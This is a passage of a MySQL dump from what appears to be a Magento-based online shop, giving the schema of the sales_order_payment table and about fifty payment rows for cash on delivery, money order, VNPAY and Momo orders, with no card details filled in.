
--
-- Table structure for table `sales_order_payment`
--

CREATE TABLE `sales_order_payment` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `parent_id` int(10) unsigned NOT NULL COMMENT 'Parent ID',
  `base_shipping_captured` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Captured',
  `shipping_captured` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Captured',
  `amount_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Amount Refunded',
  `base_amount_paid` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Paid',
  `amount_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Amount Canceled',
  `base_amount_authorized` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Authorized',
  `base_amount_paid_online` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Paid Online',
  `base_amount_refunded_online` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Refunded Online',
  `base_shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Amount',
  `shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Amount',
  `amount_paid` decimal(20,4) DEFAULT NULL COMMENT 'Amount Paid',
  `amount_authorized` decimal(20,4) DEFAULT NULL COMMENT 'Amount Authorized',
  `base_amount_ordered` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Ordered',
  `base_shipping_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Refunded',
  `shipping_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Refunded',
  `base_amount_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Refunded',
  `amount_ordered` decimal(20,4) DEFAULT NULL COMMENT 'Amount Ordered',
  `base_amount_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Canceled',
  `quote_payment_id` int(11) DEFAULT NULL COMMENT 'Quote Payment ID',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `cc_exp_month` varchar(12) DEFAULT NULL COMMENT 'Cc Exp Month',
  `cc_ss_start_year` varchar(12) DEFAULT NULL COMMENT 'Cc Ss Start Year',
  `echeck_bank_name` varchar(128) DEFAULT NULL COMMENT 'Echeck Bank Name',
  `method` varchar(128) DEFAULT NULL COMMENT 'Method',
  `cc_debug_request_body` varchar(32) DEFAULT NULL COMMENT 'Cc Debug Request Body',
  `cc_secure_verify` varchar(32) DEFAULT NULL COMMENT 'Cc Secure Verify',
  `protection_eligibility` varchar(32) DEFAULT NULL COMMENT 'Protection Eligibility',
  `cc_approval` varchar(32) DEFAULT NULL COMMENT 'Cc Approval',
  `cc_last_4` varchar(100) DEFAULT NULL COMMENT 'Cc Last 4',
  `cc_status_description` varchar(32) DEFAULT NULL COMMENT 'Cc Status Description',
  `echeck_type` varchar(32) DEFAULT NULL COMMENT 'Echeck Type',
  `cc_debug_response_serialized` varchar(32) DEFAULT NULL COMMENT 'Cc Debug Response Serialized',
  `cc_ss_start_month` varchar(128) DEFAULT NULL COMMENT 'Cc Ss Start Month',
  `echeck_account_type` varchar(255) DEFAULT NULL COMMENT 'Echeck Account Type',
  `last_trans_id` varchar(255) DEFAULT NULL COMMENT 'Last Trans ID',
  `cc_cid_status` varchar(32) DEFAULT NULL COMMENT 'Cc Cid Status',
  `cc_owner` varchar(128) DEFAULT NULL COMMENT 'Cc Owner',
  `cc_type` varchar(32) DEFAULT NULL COMMENT 'Cc Type',
  `po_number` varchar(32) DEFAULT NULL COMMENT 'Po Number',
  `cc_exp_year` varchar(4) DEFAULT NULL COMMENT 'Cc Exp Year',
  `cc_status` varchar(4) DEFAULT NULL COMMENT 'Cc Status',
  `echeck_routing_number` varchar(32) DEFAULT NULL COMMENT 'Echeck Routing Number',
  `account_status` varchar(32) DEFAULT NULL COMMENT 'Account Status',
  `anet_trans_method` varchar(32) DEFAULT NULL COMMENT 'Anet Trans Method',
  `cc_debug_response_body` varchar(32) DEFAULT NULL COMMENT 'Cc Debug Response Body',
  `cc_ss_issue` varchar(32) DEFAULT NULL COMMENT 'Cc Ss Issue',
  `echeck_account_name` varchar(32) DEFAULT NULL COMMENT 'Echeck Account Name',
  `cc_avs_status` varchar(32) DEFAULT NULL COMMENT 'Cc Avs Status',
  `cc_number_enc` varchar(128) DEFAULT NULL,
  `cc_trans_id` varchar(32) DEFAULT NULL COMMENT 'Cc Trans ID',
  `address_status` varchar(32) DEFAULT NULL COMMENT 'Address Status',
  `additional_information` text DEFAULT NULL COMMENT 'Additional Information',
  PRIMARY KEY (`entity_id`),
  KEY `SALES_ORDER_PAYMENT_PARENT_ID` (`parent_id`),
  CONSTRAINT `SALES_ORDER_PAYMENT_PARENT_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=230 DEFAULT CHARSET=utf8 COMMENT='Sales Flat Order Payment';

--
-- Dumping data for table `sales_order_payment`
--

INSERT INTO `sales_order_payment` VALUES (1,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,25.0000,NULL,NULL,NULL,25.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(2,2,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,149.0000,NULL,NULL,NULL,149.0000,NULL,NULL,NULL,NULL,NULL,NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(3,3,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,25.0000,NULL,NULL,NULL,25.0000,NULL,NULL,NULL,NULL,NULL,NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(4,4,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,25.0000,NULL,NULL,NULL,25.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(5,5,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,262.0000,NULL,NULL,NULL,262.0000,NULL,NULL,NULL,NULL,NULL,NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(6,6,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,100.0000,NULL,NULL,NULL,100.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(7,7,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,82.0000,NULL,NULL,NULL,82.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(8,8,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,262.0000,NULL,NULL,NULL,262.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(9,9,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,230.0000,NULL,NULL,NULL,230.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(10,10,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,270.0000,NULL,NULL,NULL,270.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(11,11,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,87.0000,NULL,NULL,NULL,87.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(12,12,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,25.0000,NULL,NULL,NULL,25.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(13,13,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,25.0000,NULL,NULL,NULL,25.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(14,14,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,25.0000,NULL,NULL,NULL,25.0000,NULL,NULL,NULL,NULL,NULL,NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(15,15,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,43593600.0000,NULL,NULL,NULL,43593600.0000,NULL,NULL,NULL,NULL,'0',NULL,'checkmo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Check \\/ Money order\"}'),(16,16,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,400.0000,NULL,NULL,NULL,400.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(17,17,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,23861400.0000,NULL,NULL,NULL,23861400.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(18,18,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,42973520.0000,NULL,NULL,NULL,42973520.0000,NULL,NULL,NULL,NULL,'0',NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Cash On Delivery\",\"instructions\":null}'),(19,19,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(20,20,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(21,21,NULL,NULL,NULL,NULL,NULL,9097000.0000,NULL,NULL,0.0000,0.0000,NULL,9097000.0000,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(22,22,NULL,NULL,NULL,NULL,NULL,7399000.0000,NULL,NULL,0.0000,0.0000,NULL,7399000.0000,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(23,23,NULL,NULL,NULL,NULL,NULL,9097000.0000,NULL,NULL,0.0000,0.0000,NULL,9097000.0000,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(24,24,0.0000,0.0000,NULL,9097000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,9097000.0000,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(25,25,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(26,26,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(27,27,0.0000,0.0000,NULL,9097000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,9097000.0000,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(28,28,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(29,29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(30,30,0.0000,0.0000,NULL,6499000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,6499000.0000,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(31,31,0.0000,0.0000,NULL,9097000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,9097000.0000,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(32,32,0.0000,0.0000,NULL,29494000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,29494000.0000,NULL,29494000.0000,NULL,NULL,NULL,29494000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(33,33,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,16496000.0000,NULL,NULL,NULL,16496000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(34,34,0.0000,0.0000,NULL,9097000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,9097000.0000,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(35,35,0.0000,0.0000,NULL,7198000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,7198000.0000,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(36,36,0.0000,0.0000,NULL,6499000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,6499000.0000,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(37,37,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(38,38,0.0000,0.0000,NULL,6499000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,6499000.0000,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(39,39,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(40,40,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(41,41,0.0000,0.0000,NULL,7399000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,7399000.0000,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(42,42,0.0000,0.0000,NULL,7198000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,7198000.0000,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(43,43,0.0000,0.0000,NULL,42962744.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,42962744.0000,NULL,42962744.0000,NULL,NULL,NULL,42962744.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(44,44,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY\"}'),(45,45,0.0000,0.0000,NULL,9097000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,9097000.0000,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(46,46,0.0000,0.0000,NULL,7399000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,7399000.0000,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(47,47,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(48,48,0.0000,0.0000,NULL,9097000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,9097000.0000,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(49,49,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(50,50,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY 